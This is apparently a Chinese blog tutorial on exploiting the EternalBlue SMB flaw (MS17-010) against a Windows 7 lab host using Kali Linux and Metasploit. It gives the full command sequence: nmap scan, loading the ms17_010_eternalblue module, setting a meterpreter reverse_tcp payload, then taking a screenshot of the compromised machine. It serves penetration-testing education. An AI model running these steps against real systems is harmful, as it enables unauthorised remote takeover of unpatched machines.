网络安全与Kali Linux：利用MSF对Win7进行永恒之蓝***演练实战

课前声明：
一、本分享仅作学习交流，请自觉遵照法律法规！
二、搜索：Kali与编程，学习更多网络***干货！
基础知识介绍：
1.何为永恒之蓝？
永恒之蓝（Eternal Blue）爆发于2017年4月14日晚，是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限，以此来控制被***的计算机。甚至于2017年5月12日， 不法分子经过改造“永恒之蓝”制做了wannacry勒索病毒，使全世界大范围内遭受了该勒索病毒，甚至波及到学校、大型企业、政府等机构，只能经过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软经过打补丁修复。

2.什么是SMB协议？
SMB（全称是Server Message Block）是一个协议服务器信息块，它是一种客户机/服务器、请求/响应协议，经过SMB协议能够在计算机间共享文件、打印机、命名管道等资源，电脑上的网上邻居就是靠SMB实现的；SMB协议工做在应用层和会话层，能够用在TCP/IP协议之上，SMB使用TCP139端口和TCP445端口。

***步骤：
1、肯定***目标
1.1使用kali打开nmap扫描目标主机。
使用nmap执行命令 nmap -sS -A 192.168.17.149
-sS（使用SYN扫描）,-A(启用操做系统检测和版本检测)。

1.2根据咱们的扫描结果能够大体判断该系统可能存在永恒之蓝漏洞。
2、***步骤
2.1执行命令msfconsole打开metasploit。
2.2执行命令 search ms17_010 查询咱们所须要的***模块。

2.3找到咱们须要的***模块后执行命令,
use exploit/windows/smb/ms17_010_eternalblue
2.4执行命令 search payload 查找咱们须要的payload。

2.5接下来咱们利用该payload
执行命令 set payload windows/x64/meterpreter/reverse_tcp。
2.6执行命令 show options 来查看咱们所须要设置的参数。
其中RHOSTS（被***计算机IP）和LHOST（本身kali IP）是须要本身设置。

2.7执行命令：set LHOST 192.168.17.148，set RHOSTS 192.168.17.149便可。

2.8在设置好一切以后只须要执行命令 exploit 便可自动开始***。出现截图中的回显时就表示已经***成功了。

2.9咱们只须要执行help便可查看咱们可以执行哪些操做。
最后咱们执行了 meterpreter > screenshot 对被***对象进行了屏幕截图测试。

辛苦原创，各位看官记得好评加关注哦！你也可搜索:Kali与编程，学习更多Kali Linux***与白帽编程技巧哦！
点我学习更多Kali Linux***测试与网络***实战技巧！请添加连接描述